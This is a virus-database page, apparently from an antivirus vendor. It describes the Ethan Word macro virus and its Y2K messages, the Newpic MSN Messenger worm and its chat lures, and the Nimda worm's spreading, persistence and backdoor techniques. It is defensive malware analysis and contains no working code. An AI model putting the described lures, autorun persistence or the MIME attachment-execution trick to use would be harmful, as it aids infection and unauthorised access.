Virus Database

Macro.Word97.Ethan

Description Macro.Word97.Ethan

On the first workday day of each month before 12:00 am upon opening documents, this virus displays one of the following messages:
On April 1, 1999
Y2K! Spread the word
This is not an April fools joke. I wish it were! The year 2000 is fast
approaching, and the word still needs to be spread about the
implications and dangers of the millennium bug commonly referred to as
the Y2K bug. The virus that has infected this word document was written
to help spread the word about the Y2K bug, and educate you so you can
prepare yourself and your family for Saturday January 1, 2000. today
until January 1, 2000, on the first business day of each month, I will
give you a lesson in Y2K preparation. Spread the word. Knowledge is
power!

On May 3, 1999
Hello again!
Lets start our first lesson to help prepare you for the millennium bug.
Although I don't personally believe there will be food shortages, power
shortages, gas shortages as a result of a computer bug, there will be
food, power and gas shortages by hoarding nitwits that fear the
millennium bug. As a result, I highly recommend that you begin to
stockpile bottled water (1-month supply), canned food (1-month supply),
and as much gas as you can store (keep your vehicle gas tank always
topped up starting December 1st). That's it for this month. See you
next month!

On June 1, 1999
How's the weather?
Right now it's pretty warm out, so you are probably not thinking much
about the winter. But remember the millennium bug is expected to hit in
the middle of winter. If you're in a northern climate, like the Great
White North (Canada), I suggest you consider purchasing a good airtight
wood stove, and at least a face cord of wood. Even if there are no
disruptions in natural gas, or oil, or electricity, the wood stove is a
great way of reducing your heating bills. And if there is a problem, you
will be comfortable in your own heated home, unlike your unprepared
neighbors (remember the Canadian ice storm last year!) That's it for
this month. See you next month!

On July 2, 1999
Did you get the stove?
Last month I recommend purchasing a gas stove to help heat your home in
the event that your supply of electricity, gas, or oil was interrupted.
This month I would like to suggest that you purchase a portable
generator and enough gas cans to store gas to power the generator. The
generator can be used to power lighting and small electrical appliances
should the power be disrupted. That's it for this month. See you next
month!

On August 2, 1999
Getting back to basics
In this installment, I would like to suggest that you consider
purchasing candles, matches, flashlights, and batteries. These items
will be invaluable during those cold, dark nights should the power
companies fail in their Y2K conversion. Don't plan on relying on the
banks or credit/debit cards. Start each month, and stash away enough
money to last you at least 2 months. This money should include enough
money to pay the rent/mortgage, utilities, FOOD, etc. Remember cold hard
cash is accept EVERYWHERE. That's it for this month. See you next
month!

On September 1, 1999
A Limerick
The millennium 's not far away Get onto your coding today Fix it or
fudge it The boss won't begrudge it If everything works on the day!
That's it for this month. See you next month!

On October 1, 1999
Three months to go
Getting nervous? If you've followed my advice over the past months,
there should be nothing for you to worry about. We will survive the Y2K
bug, but preparation will insure that if there is any Y2K crisis, it
will only be small bump on the road, not a major pothole for you. That
's it for this month. See you next month!

On November 1, 1999
Two months to go
Personally, I don't believe that there will be a major, global Y2K
crisis. I trust the banks with my money, I trust MOST of the industrial
sector, and I trust the power and water agencies to provide me with
power and water over the infamous weekend. I even trust the Russians and
there nuclear arms! BUT you can never be too careful. Take care. Be
prepared. Use common sense. That 's it for this month. See you next
month!"

On December 1, 1999
Good Luck (30 days to go)
Well, this will be the final installment in the Y2K preparation lessons.
If you have followed my advice over the past few months, you will be in
excellent shape to bring in the New Year. May the New Year bring you
health and happiness. Best wishes. Bye!

Check other viruses! Be aware! Use Antiviral Software

I-Worm.Newpic.a

Description I-Worm.Newpic.a

This is a virus-worm that spreads via the Internet using MSN Messenger (instant messaging program). The worm itself is a Windows EXE file about 50Kb in length written in Visual Basic.
When an infected file is run, the worm dislays the following fake message:
Error
Cannot open file. May be corupted. Replace the file with a new
one and try again.
Then it registers itself in the auto-run registry key:
HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun MSN Messenger = %filename%
where %filename% is the worm's full file name.
The worm then waits for incoming messages and replies with the following text:
hey, want me to send my new pic?
i took it yesterday
The the worm waits for an answer. If a user answers with one of following words:
sure
yes
yea
guess
ok
send
maybe
go
the worm sends its EXE file to a victim and then sends one of the following randomly selected texts:
alright, here ya go
i hope you like it
there
pweese? :)
ok cool
The worm also creates the "C:Messenger1324Brain1Read Me.txt" file and writes a text there:
I come in piece. My name is Jerry.
The purpose of me is to spread. I'm not annoying, nor dangerous.
How to remove me:
1) Click Start, select Run. The Run dialog box pops up.
2) Type: msconfig The System Configuration Utility pops up.
3) Click the Startup tab at the top. In the list, find MsgSprd, Messenger, or pic1324, uncheck, press Apply, then press Ok.
4) Restart your computer Or press Ctrl - Alt - Del, select MsgSprd from the list, then press End Task.
You may freely delete the files or the 'C:Messenger1324' directory.

I-Worm.Nimda

Description I-Worm.Nimda

This is a virus-worm that spreads via the Internet attached to infected e-mails, and copies itself to shared directories over a local network, and also attacks vulnerable IIS machines (Web sites). The worm itself is a Windows PE EXE file about 57Kb in length, and is written in Microsoft C++.
In order to run from an infected message, the worm exploits a security breach. The worm then installs itself to the system, and runs a spreading routine and payload.
The worm contains the following "copyright" text string:
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
Installing
While installing, the worm copies itself:
to the Windows directory with the MMC.EXE name
to the Windows system directory with RICHED20.DLL (and overwrites original Windows RICHED20.DLL file) and with the LOAD.EXE name.
The last one is then registered in the auto-run section in a SYSTEM.INI file:
[boot] shell=explorer.exe load.exe -dontrunold
The worm also copies itself to a Temporary directory with random MEP*.TMP and MA*.TMP.EXE names, for example:
mep01A2.TMP
mep1A0.TMP.exe
mepE002.TMP.exe
mepE003.TMP.exe
mepE004.TMP

EXE files have Hidden and System attributes, as well as a LOAD.EXE file (see above).
The worm then runs its spreading and payload routines. Depending on the Windows version, the worm affects the EXLORER.EXE process, and may run its routines as an EXPLORER' background process (thread).
Spreading via E-mail
In order to send infected messages, the worm connects to a host machine by using SMTP protocol, and sends its copies to victim addresses.
In order to obtain victim e-mail addresses, the worm uses two ways:
1. scans *.HTM and *.HTML files and looks for e-mail-like strings
2. by using MAPI, connects to MS Exchange e-mail boxes and obtains e-mail addresses from there.
The infected messages are of HTML format and contain:
Subject: empty or random
Body: empty
Attach: README.EXE

Subjects are chosen from the name of a randomly selected file from a folder:
HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerShell FoldersPersonal
usually this is "My Documents" or a randomly selected file on the C: drive.
In order to spread from infected messages, the worm uses an "IFRAME" trick; the vulnerability described at:
Microsoft Security Bulletin (MS01-020): Incorrect MIME Header Can Cause IE to Execute E-mail Attachment http://www.microsoft.com/technet/security/bulletin/MS01-020.asp
Download patch:
http://www.microsoft.com/windows/ie/downloads/critical/q290108/default.asp
What causes the vulnerability?
If an HTML mail contains an executable attachment, whose MIME type is incorrectly given as one of several unusual types, a flaw in IE will cause the attachment to be executed without displaying a warning dialogue.
What does the patch do?
The patch eliminates the vulnerability by correcting the table of MIME types and their associated actions in IE. This has the effect of preventing e-mails from being able to automatically launch executable attachments.
Spreading via the local network
The worm scans local and shared (mapped) remote drives in three different manners, and infects all accessible directories in there.
While infecting, the worm uses two different ways:
1. It creates .EML (95% of the time) or .NWS (5%) files with randomly selected names. As a result, these EML and NWS files are everywhere on an infected machine (and in the local network), and there may be thousands of them. These files contain the worm's copy in e-mail form.
The e-mail form is an HTML e-mail message with the worm's copy in a MIME envelope, and with an IFRAME trick as described above. Upon being opened, this message immediately infects a vulnerable machine.
2. The worm looks for filename+extension combinations:
*DEFAULT* , *INDEX* , *MAIN* , *README* + .HTML, .HTM, .ASP
(*NAME* means that may be a sub-string in the file name)
In case such file is found, the worm copies itself in e-mail form to there with the README.EML name, and appends to a victim's HTM/ASP file a JavaScript program that simply opens the README.EML file when the HTML/ASP file is being opened, activating the worm as a result.
As a result, the worm infects Web pages, and may spread to machines that visit these Web sites.
Spreading as an IIS attack
To upload its file to a victim's machine, the worm uses a "tftp" command, and activates a temporary TFTP server on an infected (current) machine to process the "get data" command from the victim's (remote) machine in exactly the same way as the {"BlueCode":IISWorm_BlueCode} IIS worm.
The name of file that is uploaded to a victim's machine is ADMIN.DLL.
Payloads
The payload routine adds "Guest" user to the Administrator User Group (as a result, a "Guest" user has full access to an infected machine).
The worm also opens all local drives for sharing.
There are several variants of the "Nimda" worm.
All of them are very closed to the original, and most of them are just a "patched" version of original worm - the text strings in worm body are replaced with other strings).
Nimda.b
This is the original "Nimda" worm, however compressed by a PCShrink Win32 PE EXE files compressor. The strings:
README.EXE , README.EML
are replaced with:
PUTA!!.SCR , PUTA!!.EML
Nimda.c
This is exactly the original "Nimda" worm although compressed by a UPX compressor.
Nimda.d
This variant of the worm was mailed to the Internet at the end of October 2001. It was spread in compressed form (PECompact compressor), and this form is 27K in size.
The only difference from original worm is the "copyright" text strings that are patched in this version with the following text:
HoloCaust Virus.! V.5.2 by Stephan Fernandez.Spain
Nimda.e
This is a recompiled "Nimda" variant, and there are several minor routines either slightly fixed and/or optimized. This variant was found in the wild at the end of October 2001.
The visible differences from the original worm version are:
The attached file name:
SAMPLE.EXE (instead of README.EXE)
The DLL files are:
HTTPODBC.DLL and COOL.DLL (instead of ADMIN.DLL)
The "copyright" text is replaced with:
Concept Virus(CV) V.6, Copyright(C)2001, (This's CV, No Nimda.)

Home